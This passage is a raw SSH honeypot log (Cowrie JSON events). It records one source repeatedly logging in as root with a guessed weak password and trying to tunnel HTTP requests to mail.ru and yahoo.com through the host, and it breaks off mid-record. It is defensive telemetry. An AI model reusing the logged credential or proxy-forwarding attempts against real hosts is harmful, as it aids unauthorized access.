{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":16192,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:16192","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.005808Z","session":"3b9e613b139e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.060002Z","src_ip":"77.83.207.83","session":"3b9e613b139e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27362,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27362","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.207620Z","session":"3b9e613b139e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.261040Z","src_ip":"77.83.207.83","session":"3b9e613b139e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":13716,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:13716","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.407618Z","session":"3b9e613b139e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.460977Z","src_ip":"77.83.207.83","session":"3b9e613b139e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.514992Z","src_ip":"77.83.207.83","session":"3b9e613b139e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":42661,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa933b1584b5","protocol":"ssh","message":"New connection: 77.83.207.83:42661 (1.2.3.4:22) [session: aa933b1584b5]","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.563266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.563885Z","src_ip":"77.83.207.83","session":"aa933b1584b5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.614009Z","src_ip":"77.83.207.83","session":"aa933b1584b5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.861773Z","src_ip":"77.83.207.83","session":"aa933b1584b5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7228,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7228","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.912158Z","session":"aa933b1584b5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:28.961896Z","src_ip":"77.83.207.83","session":"aa933b1584b5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":18976,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:18976","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.104248Z","session":"aa933b1584b5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.154012Z","src_ip":"77.83.207.83","session":"aa933b1584b5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":26000,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26000","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.296045Z","session":"aa933b1584b5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.346140Z","src_ip":"77.83.207.83","session":"aa933b1584b5"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.396431Z","src_ip":"77.83.207.83","session":"aa933b1584b5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43065,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0969212ee8b","protocol":"ssh","message":"New connection: 77.83.207.83:43065 (1.2.3.4:22) [session: b0969212ee8b]","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.446146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.446920Z","src_ip":"77.83.207.83","session":"b0969212ee8b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.497580Z","src_ip":"77.83.207.83","session":"b0969212ee8b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.750206Z","src_ip":"77.83.207.83","session":"b0969212ee8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3790,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3790","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.804609Z","session":"b0969212ee8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.855238Z","src_ip":"77.83.207.83","session":"b0969212ee8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2880,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2880","sensor":"my-vps","timestamp":"2025-08-31T03:44:29.997263Z","session":"b0969212ee8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.048206Z","src_ip":"77.83.207.83","session":"b0969212ee8b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":10037,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:10037","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.192936Z","session":"b0969212ee8b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.243780Z","src_ip":"77.83.207.83","session":"b0969212ee8b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.295520Z","src_ip":"77.83.207.83","session":"b0969212ee8b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43148,"dst_ip":"1.2.3.4","dst_port":22,"session":"22cf645dc399","protocol":"ssh","message":"New connection: 77.83.207.83:43148 (1.2.3.4:22) [session: 22cf645dc399]","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.347665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.348727Z","src_ip":"77.83.207.83","session":"22cf645dc399"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.401303Z","src_ip":"77.83.207.83","session":"22cf645dc399"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.662441Z","src_ip":"77.83.207.83","session":"22cf645dc399"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27326,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27326","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.716572Z","session":"22cf645dc399"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.769092Z","src_ip":"77.83.207.83","session":"22cf645dc399"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":25197,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25197","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.914764Z","session":"22cf645dc399"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:30.967187Z","src_ip":"77.83.207.83","session":"22cf645dc399"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":763,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:763","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.114738Z","session":"22cf645dc399"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.167083Z","src_ip":"77.83.207.83","session":"22cf645dc399"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.220157Z","src_ip":"77.83.207.83","session":"22cf645dc399"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43246,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6ebe0dae9a3","protocol":"ssh","message":"New connection: 77.83.207.83:43246 (1.2.3.4:22) [session: e6ebe0dae9a3]","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.269615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.279881Z","src_ip":"77.83.207.83","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.320418Z","src_ip":"77.83.207.83","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.572903Z","src_ip":"77.83.207.83","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10017,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10017","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.624929Z","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.675550Z","src_ip":"77.83.207.83","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":24867,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:24867","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.817028Z","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:31.867821Z","src_ip":"77.83.207.83","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":26085,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26085","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.008941Z","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.059770Z","src_ip":"77.83.207.83","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.111405Z","src_ip":"77.83.207.83","session":"e6ebe0dae9a3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":43337,"dst_ip":"1.2.3.4","dst_port":22,"session":"68207a874a19","protocol":"ssh","message":"New connection: 77.83.207.83:43337 (1.2.3.4:22) [session: 68207a874a19]","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.160541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:32.161721Z","src_ip":"77.83.207.83","session":"68207a874a19"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh